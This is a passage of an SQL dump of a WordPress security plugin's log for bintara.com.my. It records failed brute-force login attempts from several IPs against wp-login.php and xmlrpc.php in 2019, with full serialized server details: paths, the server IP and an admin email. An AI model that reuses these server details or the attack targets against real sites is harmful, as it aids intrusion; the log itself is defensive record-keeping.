Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"33874\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5UqBTPYOiG2TtxVKr-@AAAAUE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567511721.2611\";s:12:\"REQUEST_TIME\";s:10:\"1567511721\";}}','notice','2019-09-03 11:55:24','2019-09-03 11:55:22',18206008,19503720,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.92.254'),(23612,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"33408\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5UpBTPYOiG2TtxVKr-9AAAAVU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567511716.5468\";s:12:\"REQUEST_TIME\";s:10:\"1567511716\";}}','notice','2019-09-03 11:55:19','2019-09-03 11:55:17',17688624,19178840,'https://bintara.com.my/wp-login.php',1,0,'157.230.92.254'),(23611,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.248.163.102\";s:11:\"REMOTE_PORT\";s:5:\"45666\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5QKxTPYOiG2TtxVKr89wAAAVE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567510571.6569\";s:12:\"REQUEST_TIME\";s:10:\"1567510571\";}}','notice','2019-09-03 11:36:15','2019-09-03 11:36:12',18202840,19500096,'https://bintara.com.my/xmlrpc.php',1,0,'104.248.163.102'),(23607,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"93.191.156.156\";s:11:\"REMOTE_PORT\";s:5:\"38586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5LhhTPYOiG2TtxVKr5UgAAAUo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567509382.7961\";s:12:\"REQUEST_TIME\";s:10:\"1567509382\";}}','notice','2019-09-03 11:16:24','2019-09-03 11:16:23',17685920,19175904,'https://bintara.com.my/wp-login.php',1,0,'93.191.156.156'),(23608,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"93.191.156.156\";s:11:\"REMOTE_PORT\";s:5:\"39032\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5LihTPYOiG2TtxVKr5VQAAAUk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567509386.8792\";s:12:\"REQUEST_TIME\";s:10:\"1567509386\";}}','notice','2019-09-03 11:16:30','2019-09-03 11:16:27',18204688,19504296,'https://bintara.com.my/xmlrpc.php',1,0,'93.191.156.156'),(23609,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.248.163.102\";s:11:\"REMOTE_PORT\";s:5:\"45372\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5QJxTPYOiG2TtxVKr89AAAAUM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567510567.4563\";s:12:\"REQUEST_TIME\";s:10:\"1567510567\";}}','notice','2019-09-03 11:36:09','2019-09-03 11:36:08',17693456,19179312,'https://bintara.com.my/wp-login.php',1,0,'104.248.163.102'),(23610,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.248.163.102\";s:11:\"REMOTE_PORT\";s:5:\"45372\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW5QJxTPYOiG2TtxVKr89AAAAUM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567510567.4563\";s:12:\"REQUEST_TIME\";s:10:\"1567510567\";}}','notice','2019-09-03 11:36:10','2019-09-03 11:36:08',17854504,19179312,'https://bintara.com.my/wp-login.php',1,0,'104.248.163.102'),(25812,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYh0XkXpgmG5P@iB8kvqQAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.11.43\";s:11:\"REMOTE_PORT\";s:5:\"47758\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYh0XkXpgmG5P@iB8kvqQAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071569.2462\";s:12:\"REQUEST_TIME\";s:10:\"1569071569\";}}','notice','2019-09-21 13:12:50','2019-09-21 13:12:49',17803376,19290168,'https://bintara.com.my/blog/wp-login.php',1,0,'159.203.11.43'),(25811,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhzHkXpgmG5P@iB8kvpQAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"41388\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhzHkXpgmG5P@iB8kvpQAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071564.6592\";s:12:\"REQUEST_TIME\";s:10:\"1569071564\";}}','notice','2019-09-21 13:12:46','2019-09-21 13:12:45',18313472,19611696,'https://bintara.com.my/2019/xmlrpc.php',1,0,'159.203.12.18'),(25810,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 